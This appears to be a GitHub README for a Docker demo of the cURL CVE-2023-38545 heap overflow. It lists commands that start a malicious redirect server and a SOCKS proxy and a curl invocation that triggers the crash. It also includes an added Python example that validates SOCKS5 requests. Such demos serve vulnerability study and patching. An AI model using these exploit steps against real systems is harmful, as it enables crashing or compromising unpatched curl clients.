vanigori / CVE-2023-38545-sample

Dockerfile containing all the necessary setup files to demo the exploit


Quick description

This showcases the cURL CVE-2023-38545. It is as lightweight as I could make it.

Setup

First, build the Docker Image:

docker build . -t cveimage

Next, run the image. The --rm flag creates a temporary Docker container that is deleted as soon as it is stopped:

docker run --rm --tty --net="host" --name cvecontainer cveimage

If the container's own terminal is awkward to type into, open another terminal and attach a shell with:

docker exec -it cvecontainer /bin/bash

Now, we need to start all the services. Connect to the already-running container, and run:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Now, from inside the container you can see the cURL exploit in action:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

A segmentation fault on the machine that ran the curl command is the indicator that the exploit succeeded. If you do not see one, either the overflow did not occur, or the process had enough heap available that the overwrite stayed inside accessible memory.
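The demo above sends curl through a socks5h proxy, which means curl hands the hostname to the proxy inside the SOCKS5 CONNECT request rather than resolving it locally. The following is an added example, written for this page and not code from the repository's proxy.py, showing how that request is encoded and validated per RFC 1928: the domain-name form (ATYP 3) carries its length in a single octet, so a conforming encoder must refuse names longer than 255 bytes, and a conforming parser must check every length field before slicing. Hostnames are assumed to be passed already in ASCII (punycode for internationalized names); the function and field names are this example's own.

```python
"""Added example (not part of the vanigori/CVE-2023-38545-sample repo):
encode and validate SOCKS5 CONNECT requests as laid out in RFC 1928,
enforcing the one-byte hostname length limit that the wire format imposes."""
import ipaddress
import struct

SOCKS_VERSION = 5
CMD_CONNECT = 1
ATYP_IPV4 = 1
ATYP_DOMAIN = 3
ATYP_IPV6 = 4
MAX_DOMAIN_LEN = 255  # RFC 1928 section 4: the length prefix is one octet


def build_socks5_connect(host: str, port: int) -> bytes:
    """Client side: encode a CONNECT request that carries the hostname
    (ATYP 3), the form used when the proxy performs DNS (curl's socks5h).
    Names the wire format cannot carry are rejected outright rather than
    truncated or handled by some fallback path."""
    name = host.encode("ascii")  # assumption: IDNs are pre-converted to punycode
    if not 1 <= len(name) <= MAX_DOMAIN_LEN:
        raise ValueError(
            f"hostname is {len(name)} bytes; SOCKS5 can only encode 1..{MAX_DOMAIN_LEN}"
        )
    if not 1 <= port <= 65535:
        raise ValueError(f"port {port} out of range")
    header = bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_DOMAIN, len(name)])
    return header + name + struct.pack("!H", port)


def parse_socks5_connect(data: bytes) -> dict:
    """Proxy side: validate a CONNECT request. Every length is checked
    against the actual buffer size before any slice is taken, and the
    request must be exactly as long as its own fields claim."""
    if len(data) < 4:
        raise ValueError("request shorter than the fixed 4-byte header")
    ver, cmd, rsv, atyp = data[0], data[1], data[2], data[3]
    if ver != SOCKS_VERSION:
        raise ValueError(f"unsupported SOCKS version {ver}")
    if cmd != CMD_CONNECT:
        raise ValueError(f"unsupported command {cmd}")
    if rsv != 0:
        raise ValueError("reserved byte must be zero")

    if atyp == ATYP_DOMAIN:
        if len(data) < 5:
            raise ValueError("missing domain length octet")
        name_len = data[4]
        if name_len == 0:
            raise ValueError("empty domain name")
        body_end = 5 + name_len
        if len(data) != body_end + 2:
            raise ValueError("declared name length does not match request size")
        host = data[5:body_end].decode("ascii")
    elif atyp == ATYP_IPV4:
        if len(data) != 4 + 4 + 2:
            raise ValueError("bad IPv4 request size")
        host = str(ipaddress.IPv4Address(data[4:8]))
    elif atyp == ATYP_IPV6:
        if len(data) != 4 + 16 + 2:
            raise ValueError("bad IPv6 request size")
        host = str(ipaddress.IPv6Address(data[4:20]))
    else:
        raise ValueError(f"unknown address type {atyp}")

    (port,) = struct.unpack("!H", data[-2:])
    return {"atyp": atyp, "host": host, "port": port}


if __name__ == "__main__":
    # Constructed sample: the request curl would send for http://localhost:8000
    req = build_socks5_connect("localhost", 8000)
    print(req.hex())                   # 050100030 9 6c6f63616c686f7374 1f40 (spaces added for reading)
    print(parse_socks5_connect(req))   # {'atyp': 3, 'host': 'localhost', 'port': 8000}
    try:
        build_socks5_connect("a" * 300, 80)
    except ValueError as exc:
        print("rejected:", exc)        # 300-byte name cannot be encoded
```

The point of the parser is that the length octet is treated as a claim to be verified, not a value to trust: a request whose length byte disagrees with the bytes actually received is rejected before any copy happens, which is the discipline the CVE exercised by this repo is about.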

More work (PRs welcome)

  • Make this README look pretty
  • Configure systemd to automatically start the exploit code
  • Reduce Docker Image build time and size
  • Anything/everything else...?

References


License:GNU General Public License v3.0
